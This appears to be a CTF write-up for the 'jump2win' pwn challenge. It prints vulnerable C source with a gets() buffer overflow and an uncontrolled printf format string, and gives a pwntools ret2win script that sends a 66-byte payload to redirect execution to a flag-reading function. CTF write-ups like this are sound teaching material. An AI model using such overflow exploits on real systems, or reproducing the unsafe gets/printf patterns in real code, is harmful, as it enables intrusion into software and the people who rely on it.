AUCHALL - [Pwn] - jump2win
Challenge Description
A leap of faith.
Solution
First thing we would check is binary protections
Only NX is enabled which means that we cannot execute our shellcode
PIE is disabled
On checking source code I found out that there is use of gets() function so we can do buffer overflow
Source Code
#include <stdio.h>
#include <stdlib.h>
void call_my_function(void) {
FILE *file;
char line[100];
file = fopen("/flag", "r");
if (file == NULL) {
puts("[FAIL] Contact an admin.\n");
exit(1);
}
while (fgets(line, sizeof(line), file) != NULL) {
puts(line);
}
fclose(file);
}
void vuln() {
int allowed = 0;
char buffer[50];
printf("Hello, my name is Ali, what is yours? ");
gets(buffer);
printf(buffer); // :)
}
int main() {
setbuf(stdin, NULL);
setbuf(stdout, NULL);
setbuf(stderr, NULL);
vuln();
}
Offset
For offset we would run it in gdb
So we have found offset is 66
Solution
I made a simple pwntools script to get this working
from pwn import *
elf = ELF('./jmp')
io = process('./jmp')
io = remote('section-b.cy243l.ooguy.com', PORT)
print(io.recv())
payload = cyclic(66) + p32(elf.sym.call_my_function)
io.sendline(payload)
print(io.recv())
io.interactive()
Flag
Flag is dynamic
CY243L{ret2wins_are_easy_no_0F01Cd9_X6V8_1MZx}
Writeups 2023 © RootxRAN.